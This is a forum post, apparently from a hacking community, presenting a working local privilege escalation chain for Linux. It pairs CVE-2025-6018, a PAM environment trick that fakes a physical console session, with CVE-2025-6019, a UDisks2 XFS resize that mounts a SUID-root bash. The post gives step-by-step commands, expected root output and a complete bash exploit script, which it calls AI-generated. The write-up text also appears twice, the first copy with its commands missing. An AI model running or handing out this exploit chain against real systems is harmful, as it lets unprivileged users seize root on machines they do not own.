Hello xss.pro community,
Today I present you a write-up and working PoC chain based on two recently disclosed vulnerabilities affecting major Linux distributions - Reported by BleepingComputer:
https://www.bleepingcomputer[.]com/...ts-attackers-get-root-on-major-linux-distros/
Other references used in this write-up are included at the end of the post.
This LPE chain allows full root from an unprivileged user (even over SSH) with no kernel exploits required.
Two CVEs are involved:
1. CVE-2025-6018 – Trick PAM into thinking you're physically present via crafted environment vars.
2. CVE-2025-6019 – Use UDisks2 to mount a malicious XFS image containing a SUID-root binary.
CVE-2025-6018 – Exploit PAM environment to fake "allow_active":
On openSUSE 15, PAM is configured to read
These environment variables are loaded by pam_env and then passed to pam_systemd,
which uses them to determine session type.
By setting:
we can make systemd-logind believe we are sitting at the console, This results in Polkit granting "allow_active" permissions.
Steps:
1. Login as unprivileged user via SSH
2. Create
3. Log out and back in
4. Verify that Polkit thinks we are a physical user:
Output should be:
This gives access to many privileged Polkit actions.
CVE-2025-6019 – Mount SUID XFS via UDisks2 Resize
Details:
If a user is "allow_active", UDisks2 permits resizing of filesystems.
For XFS, the resizing logic in libblockdev mounts the image into /tmp temporarily
with full privileges – but WITHOUT
This means an attacker can craft an XFS image containing a SUID-root binary.
When libblockdev mounts the image to resize it, the attacker can execute their
SUID binary from /tmp and gain root.
Create malicious XFS image:
Exploit on victim (as allow_active user):
1. Kill auto-mounting process:
2. Set up loop device:
3. Hold the image busy so it doesn't unmount:
4. Trigger filesystem resize via D-Bus:
Expected output: Resize fails with "target is busy" but the image is mounted.
5. Run SUID shell:
6. Confirm root:
Chaining Both:
1. Exploit CVE-2025-6018 to become allow_active
2. Exploit CVE-2025-6019 to mount malicious XFS image
3. Execute root shell from /tmp/blockdev*
Example Proof-of-Concept (AI Generated expect bugs):
References:
bugs.launchpad.net
ssd-disclosure.com
Today I present you a write-up and working PoC chain based on two recently disclosed vulnerabilities affecting major Linux distributions - Reported by BleepingComputer:
https://www.bleepingcomputer[.]com/...ts-attackers-get-root-on-major-linux-distros/
Other references used in this write-up are included at the end of the post.
This LPE chain allows full root from an unprivileged user (even over SSH) with no kernel exploits required.
Two CVEs are involved:
1. CVE-2025-6018 – Trick PAM into thinking you're physically present via crafted environment vars.
2. CVE-2025-6019 – Use UDisks2 to mount a malicious XFS image containing a SUID-root binary.
CVE-2025-6018 – Exploit PAM environment to fake "allow_active":
On openSUSE 15, PAM is configured to read
~/.pam_environment when users log in.These environment variables are loaded by pam_env and then passed to pam_systemd,
which uses them to determine session type.
By setting:
XDG_SEAT=seat0 XDG_VTNR=1 we can make systemd-logind believe we are sitting at the console, This results in Polkit granting "allow_active" permissions.
Steps:
1. Login as unprivileged user via SSH
2. Create
~/.pam_environment:echo 'XDG_SEAT OVERRIDE=seat0' > ~/.pam_environment echo 'XDG_VTNR OVERRIDE=1' >> ~/.pam_environment 3. Log out and back in
4. Verify that Polkit thinks we are a physical user:
gdbus call --system \
--dest org.freedesktop.login1 \
--object-path /org/freedesktop/login1 \
--method org.freedesktop.login1.Manager.CanReboot
Output should be:
('yes',)This gives access to many privileged Polkit actions.
CVE-2025-6019 – Mount SUID XFS via UDisks2 Resize
Details:
If a user is "allow_active", UDisks2 permits resizing of filesystems.
For XFS, the resizing logic in libblockdev mounts the image into /tmp temporarily
with full privileges – but WITHOUT
nosuid and nodev flags.This means an attacker can craft an XFS image containing a SUID-root binary.
When libblockdev mounts the image to resize it, the attacker can execute their
SUID binary from /tmp and gain root.
Create malicious XFS image:
# On attacker system: dd if=/dev/zero of=xfs.image bs=1M count=300 mkfs.xfs xfs.image mkdir mnt mount -t xfs xfs.image mnt cp /bin/bash mnt/ chmod 4555 mnt/bash umount mnt # Send image to victim machine: scp xfs.image user@victim:Exploit on victim (as allow_active user):
1. Kill auto-mounting process:
killall -KILL gvfs-udisks2-volume-monitor2. Set up loop device:
udisksctl loop-setup --file ./xfs.image --no-user-interaction3. Hold the image busy so it doesn't unmount:
while true; do /tmp/blockdev*/bash -p -c 'sleep 5; id' && break; done &4. Trigger filesystem resize via D-Bus:
gdbus call --system \
--dest org.freedesktop.UDisks2 \
--object-path /org/freedesktop/UDisks2/block_devices/loop0 \
--method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
Expected output: Resize fails with "target is busy" but the image is mounted.
5. Run SUID shell:
/tmp/blockdev*/bash -p6. Confirm root:
$ id
uid=65534(nobody) gid=65534(nobody) euid=0(root)
Chaining Both:
1. Exploit CVE-2025-6018 to become allow_active
2. Exploit CVE-2025-6019 to mount malicious XFS image
3. Execute root shell from /tmp/blockdev*
Example Proof-of-Concept (AI Generated expect bugs):
Bash:
set -e
IMAGE_NAME="xfs.image"
MOUNT_NAME="mnt_xfs"
SUID_SHELL="bash"
function create_xfs_image() {
echo "[*] Creating malicious XFS image with SUID bash shell..."
dd if=/dev/zero of=$IMAGE_NAME bs=1M count=300 status=none
mkfs.xfs -f $IMAGE_NAME > /dev/null
mkdir -p $MOUNT_NAME
mount -t xfs $IMAGE_NAME $MOUNT_NAME
cp /bin/bash $MOUNT_NAME/$SUID_SHELL
chmod 4555 $MOUNT_NAME/$SUID_SHELL
umount $MOUNT_NAME
rm -rf $MOUNT_NAME
echo "[+] Done creating XFS image: $IMAGE_NAME"
}
function deploy_environment_trick() {
echo "[*] Writing .pam_environment to gain allow_active status..."
echo 'XDG_SEAT OVERRIDE=seat0' > ~/.pam_environment
echo 'XDG_VTNR OVERRIDE=1' >> ~/.pam_environment
echo "[*] Log out and log back in to apply environment trick..."
echo "[!] After re-login, run this script again with '--continue'"
exit 0
}
function verify_allow_active() {
echo "[*] Verifying Polkit allow_active status..."
result=$(gdbus call --system \
--dest org.freedesktop.login1 \
--object-path /org/freedesktop/login1 \
--method org.freedesktop.login1.Manager.CanReboot)
if echo "$result" | grep -q "'yes'"; then
echo "[+] User is recognized as allow_active"
else
echo "[!] User is NOT allow_active"
echo "[!] Run the script without --continue first to apply env trick."
exit 1
fi
}
function setup_loop_device() {
echo "[*] Killing gvfs automounter..."
killall -q -KILL gvfs-udisks2-volume-monitor || true
echo "[*] Setting up loop device..."
LOOP_OUTPUT=$(udisksctl loop-setup --file $IMAGE_NAME --no-user-interaction)
LOOP_DEV=$(echo "$LOOP_OUTPUT" | grep -o '/dev/loop[0-9]*')
echo "[+] Loop device: $LOOP_DEV"
}
function exploit_resize_mount() {
echo "[*] Running background process to hold mount busy..."
(while true; do
/tmp/blockdev*/$SUID_SHELL -p -c 'sleep 5; id && exit' && break
done 2>/dev/null) &
echo "[*] Triggering Filesystem.Resize on $LOOP_DEV..."
gdbus call --system \
--dest org.freedesktop.UDisks2 \
--object-path "/org/freedesktop/UDisks2/block_devices/$(basename $LOOP_DEV)" \
--method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
echo "[*] Attempting to execute SUID-root shell from /tmp..."
sleep 2
/tmp/blockdev*/$SUID_SHELL -p || echo "[!] Exploit failed."
}
function cleanup() {
echo "[*] Cleaning up..."
udisksctl loop-delete --block-device=$LOOP_DEV --no-user-interaction || true
rm -f $IMAGE_NAME
echo "[+] Done."
}
# Main
if [[ "$1" == "--continue" ]]; then
verify_allow_active
create_xfs_image
setup_loop_device
exploit_resize_mount
cleanup
else
deploy_environment_trick
fiReferences:
DBus and Polkit Introduction
Inspired by @4ttil4sz1a’s post on the SSD-disclosure blog, I spent some time understanding how D-Bus and Polkit work on Ubuntu and other Unix-based Linux distributions, with the goal of exploring more kernel attack surfaces.
u1f383.github.io
Bug #1812316 “systemd: lack of seat verification in PAM module p...” : Bugs : systemd package : Ubuntu
[I am sending this bug report to Ubuntu as requested by systemd at <https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports>.] As documented at <https://www.freedesktop.org/software/polkit/docs/latest/polkit.8.html>, for any action, a polkit policy can...
bugs.launchpad.net
SSD Advisory - Linux kernel hfsplus slab-out-of-bounds Write - SSD Secure Disclosure
Summary This advisory describes an out-of-bounds write vulnerability in the Linux kernel that achieves local privilege escalation on Ubuntu 22.04 for active user sessions. Credit An independent security researcher working with SSD Secure Disclosure. Vendor Response Ubuntu has released the...
ssd-disclosure.com
Последнее редактирование:
